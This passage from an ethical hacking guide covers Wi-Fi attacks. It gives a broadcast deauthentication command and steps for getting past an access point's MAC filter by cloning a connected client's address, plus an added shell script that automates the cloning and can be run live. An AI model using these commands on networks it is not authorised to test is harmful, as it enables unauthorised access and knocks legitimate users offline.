Ethical Hacking and Penetration Testing Guide
Speeding Up the Process
If we don't want to wait for a client to disconnect and reconnect on its own, we can perform a deauthentication attack, as explained earlier, to force all the clients associated with the target access point to disconnect and then reconnect to it.
Command:
aireplay-ng -0 3 -a 64:70:02:8A:12:94 mon0
The -0 selects the deauthentication attack, and the number that follows it, 3, sends exactly three deauthentication packets (a count of 0 would keep sending them until interrupted). The -a parameter specifies the MAC address of the target access point, 64:70:02:8A:12:94 in this case, followed by our monitor-mode interface, mon0. Because no client address is given with -c, the deauthentication frames are broadcast and hit every station on that access point.
Bypassing MAC Filters on Wireless Networks
Apart from hiding the SSID, it is also common practice for network administrators to apply MAC filtering on the access point so that only hosts with white-listed MAC addresses are able to connect. This is done in colleges and universities that want only registered students to have Internet access. Like the hidden SSID, MAC filtering is a low-level security measure, and like the hidden SSID it fails badly in the real world: a station's MAC address travels in the clear in every 802.11 frame it sends, so an attacker can read a legitimate client's address off the air and spoof it to connect to the access point. Here is how the attack is carried out:
1. The attacker scans the access point for the hosts that are already connected to it.
2. The attacker notes down the MAC address of a legitimate client connected to the access point and spoofs that address, thereby inheriting the client's place on the white list, and connects to the access point.
Here is how we would combine airodump-ng and macchanger to bypass MAC filtering restrictions:
Note: Make sure that monitor mode is already enabled before performing the following steps.
Step 1: The first command we use is airodump-ng, to scan for all the neighbouring networks. To demonstrate this attack, we assume that the access point with ESSID "ROMEO" and BSSID "F4:3E:61:9C:77:3B" has MAC filtering enabled, so that only a set of allowed MAC addresses can connect to it.


Step 2: The next step is to find a client that is already associated with the access point. We will use airodump-ng to find it for us.
Command:
airodump-ng -c 1 -a --bssid F4:3E:61:9C:77:3B mon0
Since the access point is on channel 1, we pass -c 1; the --bssid option restricts the output to our target access point, and the -a parameter hides unassociated clients so that only stations currently associated with the access point are displayed.
The output shows that two stations are currently associated, with MAC addresses B0:D0:9C:5C:EF:86 and 48:DC:FB:B1:F3:7D.
Step 3: The final step is to spoof our MAC address, changing it to that of one of the clients. We can use a neat program in BackTrack called macchanger, but for that we first need to disable monitor mode, and the interface itself must be down, since macchanger cannot change the address of an interface that is up.
Command:
airmon-ng stop wlan0
Next, we use the following command to spoof our current MAC address.
macchanger -m B0:D0:9C:5C:EF:86 wlan0
The MAC address B0:D0:9C:5C:EF:86 belongs to a client that is already associated with the access point, so it is on the white list. Note that the real client is still on the air: either deauthenticate it first (with aireplay-ng -0, as above) or wait for it to leave, otherwise two stations share one MAC address and both will see broken connectivity. Finally, we issue the following command to bring the wlan0 interface up.
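The three steps above, put together as a script, added here as an example and not taken from the book. It parses the CSV file that airodump-ng writes when run with -w (the station table's sixth column is the BSSID a station is associated with, or "(not associated)" for clients that are only probing), picks an associated client of the target BSSID, validates the address, and runs the macchanger sequence. The CSV sample is constructed to mirror the BSSID and client MACs on this page; the commands are only printed unless LIVE=1 is set, since the real ones need root and a wireless adapter. The interface names wlan0 and mon0 are the ones the page uses.

```shell
#!/bin/sh
# Added example (not from the book): clone an associated client's MAC to
# get past an access point's MAC filter. Dry-run by default; LIVE=1 runs
# the commands for real.

# Constructed sample of the <prefix>-01.csv that airodump-ng -w writes:
# an access-point table, a blank line, then a station table whose 6th
# field is the associated BSSID or "(not associated)".
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
F4:3E:61:9C:77:3B, 2023-08-07 10:00:00, 2023-08-07 10:05:00,  1,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   5, ROMEO, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
B0:D0:9C:5C:EF:86, 2023-08-07 10:00:10, 2023-08-07 10:05:00, -50,       35, F4:3E:61:9C:77:3B, ROMEO
48:DC:FB:B1:F3:7D, 2023-08-07 10:01:00, 2023-08-07 10:04:00, -62,       12, F4:3E:61:9C:77:3B, 
AA:BB:CC:DD:EE:01, 2023-08-07 10:02:00, 2023-08-07 10:02:30, -70,        3, (not associated), HOME-NET
'

# Accept only a well-formed MAC so a mistyped or half-copied address is
# never handed to macchanger.
is_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# Read an airodump-ng CSV on stdin and print the stations associated with
# the BSSID given as $1 (case-insensitive), skipping probing-only clients.
associated_stations() {
    awk -F',' -v want="$(printf '%s' "$1" | tr 'a-f' 'A-F')" '
        /^Station MAC/ { in_stations = 1; next }
        in_stations && NF >= 6 {
            gsub(/ /, "", $1); gsub(/ /, "", $6)
            if (toupper($6) == want) print $1
        }'
}

# Run a command, or just print it unless LIVE=1.
run() {
    if [ "${LIVE:-0}" = 1 ]; then "$@"; else printf '%s\n' "$*"; fi
}

# Change $1's MAC to $2. macchanger refuses to touch an interface that is
# up, so the monitor interface is removed and the interface taken down
# before the change and brought back up afterwards.
spoof_mac() {
    iface=$1
    mac=$2
    is_mac "$mac" || { echo "refusing to spoof malformed MAC: $mac" >&2; return 1; }
    run airmon-ng stop mon0
    run ifconfig "$iface" down
    run macchanger -m "$mac" "$iface"
    run ifconfig "$iface" up
}

# Pick the first client airodump-ng saw associated with ROMEO and clone it.
# The real client is still on the air: deauthenticate it (aireplay-ng -0)
# or wait for it to leave, or two stations will share one MAC address.
target=$(printf '%s' "$SAMPLE_CSV" | associated_stations F4:3E:61:9C:77:3B | head -n 1)
[ -n "$target" ] && spoof_mac wlan0 "$target"
```

To use it against a real capture, replace the constructed SAMPLE_CSV with the contents of the file written by airodump-ng -w, check the printed command sequence, then rerun with LIVE=1.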